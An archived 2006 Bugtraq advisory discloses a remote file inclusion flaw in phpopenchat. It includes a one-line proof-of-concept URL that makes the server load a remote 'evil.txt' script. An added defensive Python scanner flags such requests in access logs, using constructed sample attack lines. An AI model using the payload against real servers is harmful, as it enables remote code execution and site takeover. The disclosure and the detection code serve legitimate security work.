Open Source and information security mailing list archives
Message-ID: <20060906191711.25859.qmail@securityfocus.com>
Date: 6 Sep 2006 19:17:11 -0000
From: stormhacker@...mail.com
To: bugtraq@...urityfocus.com
Subject: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit

[W]orld [D]efacers Team

--------------------Summary----------------
eVuln ID: WD23
Vendor: phpopenchat-3.0.*
Vendor's Web Site: http://phpopenchat.org
Class: Remote
PoC/Exploit: Available
Solution: Not Available
Discovered by: rUnViRuS ( wdzone.net & worlddefacers.de )

-----------------Description---------------
include_once("QueryString.php");
include_once("Settings.php");
include_once("$sourcedir/Subs.php");
include_once("$sourcedir/Errors.php");
include_once("$sourcedir/Load.php");
//include_once("$sourcedir/Security.php");

--------------PoC/Exploit----------------------
http://www.host.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://host/evil.txt?

--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Discovered by: rUnViRuS (worlddefacers.de)
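
Requests of the shape shown in the advisory leave a trace in web server access logs. The following is an added example, not part of the original post: it scans Combined Log Format lines for a `sourcedir` query parameter whose value, after percent-decoding, starts with a URL scheme. The log lines, the `example.invalid` host and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request field of a Combined Log Format line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that begins with a remote URL scheme
REMOTE_VALUE_RE = re.compile(r'^\s*(?:https?|ftps?)\s*:', re.I)
# Parameter names to watch; "sourcedir" is the variable named in the advisory
WATCHED_PARAMS = {"sourcedir"}

# Constructed sample log lines (documentation IP range, example.invalid host)
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Sep/2006:19:20:01 +0000] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=http://example.invalid/x.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [06/Sep/2006:19:21:40 +0000] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=%2568ttp%253A%252F%252Fexample.invalid%252Fx.txt HTTP/1.1" 200 512',
    '192.0.2.12 - - [06/Sep/2006:19:22:05 +0000] "GET /phpopenchat/index.php?lang=en HTTP/1.1" 200 2048',
    '192.0.2.13 - - [06/Sep/2006:19:23:17 +0000] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=Sources HTTP/1.1" 200 512',
]

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %2568ttp) up to a fixed depth."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_rfi_attempts(log_lines):
    """Return (line_number, path, param, value) for each suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        target = urlsplit(match.group(1))
        # parse_qsl percent-decodes once; decode_fully handles extra layers
        for name, raw in parse_qsl(target.query, keep_blank_values=True):
            value = decode_fully(raw)
            if name.lower() in WATCHED_PARAMS and REMOTE_VALUE_RE.match(value):
                hits.append((number, target.path, name, value))
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print("line %d: %s  %s=%s" % hit)
```

Access logs record only the query string, so a value delivered in a POST body or cookie will not show up in this scan.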